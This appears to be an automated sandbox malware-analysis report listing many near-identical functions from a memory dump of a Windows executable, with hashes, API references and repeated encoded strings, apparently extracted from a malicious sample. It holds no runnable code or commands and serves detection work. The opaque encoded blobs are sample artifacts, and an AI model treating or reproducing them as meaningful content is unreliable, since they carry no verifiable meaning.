API String ID: 4000879885-2292685684
Opcode ID: 2ffff5448afa04df1c30e720c5670167bedb8bd80848d8c2156032f602601880
Instruction ID: db3a9a742bc3b18fed969a22669d7153ee471ef4a14af86773de6eddf42bd562
Opcode Fuzzy Hash: 2ffff5448afa04df1c30e720c5670167bedb8bd80848d8c2156032f602601880
Instruction Fuzzy Hash: BBC08C5289E13029288432283813CEF018E8D95320312027FB400621812CC90CC202BE

Uniqueness

Uniqueness Score: -1.00%

Function 00402213, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0040221A

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

/coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 00402214, 00402219, 00402221

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
API String ID: 4000879885-2292685684
Opcode ID: efbbb7b49922172446c9a945620b54317194f649351cf925960047f73ca08c00
Instruction ID: 75e2ee2d00cad990c8ee5a6c383f7e220b5dab7020b6ee9e215765286b6bd1a5
Opcode Fuzzy Hash: efbbb7b49922172446c9a945620b54317194f649351cf925960047f73ca08c00
Instruction Fuzzy Hash: E1C04C6299E5312D298836583857CEB424E8DD5321356067FB510752827DC91DC303BE

Uniqueness

Uniqueness Score: -1.00%

Function 004086E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 004086E7

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

/coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 004086E1, 004086E6, 004086EE

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
API String ID: 4000879885-2292685684
Opcode ID: 6d198562c2906a3f6ab1cfed14609699f7c8fd3d8bce05349d5397ab8c4c1d76
Instruction ID: 1f435ca18d71687c4f28e45de7e6c025a5cca28e9e9d8ddbcbee144203cb787f
Opcode Fuzzy Hash: 6d198562c2906a3f6ab1cfed14609699f7c8fd3d8bce05349d5397ab8c4c1d76
Instruction Fuzzy Hash: E1C04C1299E630292589325C3C47CEB414E8EA6725356066FB514661826D891DC203FD

Uniqueness

Uniqueness Score: -1.00%

Function 0040492B, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00404932

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

/coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 0040492C, 00404939

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
API String ID: 4000879885-2292685684
Opcode ID: 74c180149a57830b8fa5b2537e3976e36da201583515b033e1d7b5d949ce7622
Instruction ID: f2c8d7a3de13e68e541c6dc70ad01e80001ad99fea3add82ba75c7797f1bf965
Opcode Fuzzy Hash: 74c180149a57830b8fa5b2537e3976e36da201583515b033e1d7b5d949ce7622
Instruction Fuzzy Hash: 2AC04C62D9E53429258432683847CEB414E8D96721366066FB510652816DC95E8602FE

Uniqueness

Uniqueness Score: -1.00%

Function 00402ADE, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00402AE5

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

/coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 00402ADF, 00402AE4, 00402AEC

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
API String ID: 4000879885-2292685684
Opcode ID: a434271d11f80b7231270170b87cbcdcb25fa22eacc15e280dd82067a010f513
Instruction ID: 19d0d01f61a9806516b775edb218aaa8f2555b6eb18f54f3ac5d31e0f9756bd6
Opcode Fuzzy Hash: a434271d11f80b7231270170b87cbcdcb25fa22eacc15e280dd82067a010f513
Instruction Fuzzy Hash: 1CC04C2299E53039258832583947CFF414E8D95321356066FB510652D26D891D8303BE

Uniqueness

Uniqueness Score: -1.00%

Function 0040CA8F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0040CA96

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

/coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 0040CA90, 0040CA95, 0040CA9D

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
API String ID: 4000879885-2292685684
Opcode ID: 767b9da0cfd1fdd458533a91546a4c5110acd69e466644aebfdd7f092a03a0a8
Instruction ID: 50aea12ab7217c85875e93edddf42a33e5242cb7fa0053465ea6f83f72e45d1b
Opcode Fuzzy Hash: 767b9da0cfd1fdd458533a91546a4c5110acd69e466644aebfdd7f092a03a0a8
Instruction Fuzzy Hash: 42C04C5299E5312D258432593847CEB418E8D96721366066FB510652816D895D8202BE

Uniqueness

Uniqueness Score: -1.00%

Function 0040AB6E, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0040AB75

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

796b118984913790cb7b7fec4a7c8af0d384322142d0894e166a200f2def93ce198b621fa7dc1a295c21a3d2c1698602b14256f2cfca3061410368f8d9672540e06c543241a331eb6e9724cc2a5e11362de2abae2e64eef4bcfa15c5a68dccb4, xrefs: 0040AB6F, 0040AB74, 0040AB7C

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: 796b118984913790cb7b7fec4a7c8af0d384322142d0894e166a200f2def93ce198b621fa7dc1a295c21a3d2c1698602b14256f2cfca3061410368f8d9672540e06c543241a331eb6e9724cc2a5e11362de2abae2e64eef4bcfa15c5a68dccb4
API String ID: 4000879885-1875528820
Opcode ID: 9e84b24a8739b6f320114e89b89c716978c8de8609bfde976977d18717d724f6
Instruction ID: 005e33ed559f2cbdb538bfd0d45d5054034873f76a571432fe6b7dc315890976
Opcode Fuzzy Hash: 9e84b24a8739b6f320114e89b89c716978c8de8609bfde976977d18717d724f6
Instruction Fuzzy Hash: BAC04C6299D5312A2585365C3C47CEB418E8D667243560A7FB500652856D991D8202BE

Uniqueness

Uniqueness Score: -1.00%

Function 0040AB22, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0040AB29

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

/coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 0040AB23, 0040AB28, 0040AB30

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
API String ID: 4000879885-2292685684
Opcode ID: 55a841f7200445915a078bdcc3d0f3b9e31d943363c9ea0775166527d8799acf
Instruction ID: 43cab7890649f054a47b2bc93dee9b30beab715973e6038e5b8c84570af30f19
Opcode Fuzzy Hash: 55a841f7200445915a078bdcc3d0f3b9e31d943363c9ea0775166527d8799acf
Instruction Fuzzy Hash: 34C04C6299E53029258432693857CEB418E8D96721366066FB510A51816D895DC206FD

Uniqueness

Uniqueness Score: -1.00%

Function 00408FAB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00408FB2

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

/coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 00408FAC, 00408FB9

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
API String ID: 4000879885-2292685684
Opcode ID: 20c71592c7cfe08379052f9f2698e5742f7317711881f2ac0f22b1a8d3288e55
Instruction ID: d65cfc106405518fb0dfde2f007a596a01e51ced70a86a36281d6bfb82ebfb84
Opcode Fuzzy Hash: 20c71592c7cfe08379052f9f2698e5742f7317711881f2ac0f22b1a8d3288e55
Instruction Fuzzy Hash: 37C04C1699E57039258432597C47CEB414E8DA5721356067FB910A55816D895DC202BD

Uniqueness

Uniqueness Score: -1.00%

Function 0040521D, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00405224

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

/coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 0040521E, 0040522B

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
API String ID: 4000879885-2292685684
Opcode ID: 54326f79500c9fe6399dc31a17c5c9ef54e5dd16611aa136d981a235a6a1e1bb
Instruction ID: f953d3ba83e9c61bf668341f8d5529855eb5e0f6396ae51d5eabf50c27b7e5dc
Opcode Fuzzy Hash: 54326f79500c9fe6399dc31a17c5c9ef54e5dd16611aa136d981a235a6a1e1bb
Instruction Fuzzy Hash: FAC04C1299E5312D29843268384BCEF814E8DA672135606BFB910651856D991D8307BD

Uniqueness

Uniqueness Score: -1.00%

Function 0040D35A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0040D361

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

/coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 0040D35B, 0040D360, 0040D368

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
API String ID: 4000879885-2292685684
Opcode ID: 49519d997a765abf4d0275d088260f4708f1a7231251ef94d6a5564e6be3f3ea
Instruction ID: 08b2ad6ec19140bb706d6091351318e576b0c5b462151b7ef4e32ddb0a8f9eb4
Opcode Fuzzy Hash: 49519d997a765abf4d0275d088260f4708f1a7231251ef94d6a5564e6be3f3ea
Instruction Fuzzy Hash: 37C04C229AE57029258433593847CEB814E8DD572135606AFB510662816D895D8242FD

Uniqueness

Uniqueness Score: -1.00%

Function 0040B3ED, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0040B3F4

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

/coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 0040B3EE, 0040B3F3, 0040B3FB

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
API String ID: 4000879885-2292685684
Opcode ID: 0bcb47a73aabb7cf4c213b75beeaf698f950285e7e2b966ca43b96e48b9161ce
Instruction ID: fd56bd7ae8fc2d87a9425c9db0f58fa10f997800ea2f5dfb611921775549b15d
Opcode Fuzzy Hash: 0bcb47a73aabb7cf4c213b75beeaf698f950285e7e2b966ca43b96e48b9161ce
Instruction Fuzzy Hash: F6C04C5299E5303A2584325C3847CEB414E8D967213660A6FF510652816D895D8206BD

Uniqueness

Uniqueness Score: -1.00%

Function 00403451, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00403458

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

/coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 00403452, 0040345F

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
API String ID: 4000879885-2292685684
Opcode ID: ec479d6293f1c8d78feae1a8068e4ba54a0d822f363ec171722013c73d6d70f2
Instruction ID: 1d407cf676fe65f5fa3b04d2d1b0ecab92e22796acd6b5c4fb2f486a1eb71f36
Opcode Fuzzy Hash: ec479d6293f1c8d78feae1a8068e4ba54a0d822f363ec171722013c73d6d70f2
Instruction Fuzzy Hash: 70C04C2299E63029258832593847CEB414E8EA632135606AFB910A62826D8A1D8342BE

Uniqueness

Uniqueness Score: -1.00%

Function 0040180D, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00401814

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

/coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 0040180E, 00401813, 0040181B

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
API String ID: 4000879885-2292685684
Opcode ID: 2a939267973a6c2940af2a6b1c8a68f8dcf81406164eebe7325f54a1381f6055
Instruction ID: 895a0b870917fd1bd91e33fb7afd123699d4b945e98a70131bfdddd20c28e99c
Opcode Fuzzy Hash: 2a939267973a6c2940af2a6b1c8a68f8dcf81406164eebe7325f54a1381f6055
Instruction Fuzzy Hash: 69C04C6299E53029258836583C47CEB424E8E95721356066FB510652926D891D8302BE

Uniqueness

Uniqueness Score: -1.00%

Function 0040998C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00409993

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

/coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 0040998D, 00409992, 0040999A

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
API String ID: 4000879885-2292685684
Opcode ID: ef582153cb20f7df9a3cc5712d8bde9bd8cb8d7c4367d9e2b7246955c26888b3
Instruction ID: 453e5ca70e0b69a53aa24788dd678cbf8d7b1b1894e7a45f0c91ea3ebedce348
Opcode Fuzzy Hash: ef582153cb20f7df9a3cc5712d8bde9bd8cb8d7c4367d9e2b7246955c26888b3
Instruction Fuzzy Hash: F0C04C1299E570292585325D3847CEF414E8D95721356066FB524661816D995D8202BD

Uniqueness

Uniqueness Score: -1.00%

Function 0040BF5A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0040BF61

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

/coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 0040BF5B, 0040BF60, 0040BF68

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
API String ID: 4000879885-2292685684
Opcode ID: 74102623533f22761fd867028c631eef34f14f112259e268a725cc238f746074
Instruction ID: 57abd5afa87cd70e942503ec36f064c1533b8acb3f8ebe9cdf5d858a127a108f
Opcode Fuzzy Hash: 74102623533f22761fd867028c631eef34f14f112259e268a725cc238f746074
Instruction Fuzzy Hash: BBC04C5299E53029298436583847CEF414E8D96721356067FB511651816D895DC206BD

Uniqueness

Uniqueness Score: -1.00%

Function 00403FB3, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00403FBA

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

/coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 00403FB4, 00403FC1

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
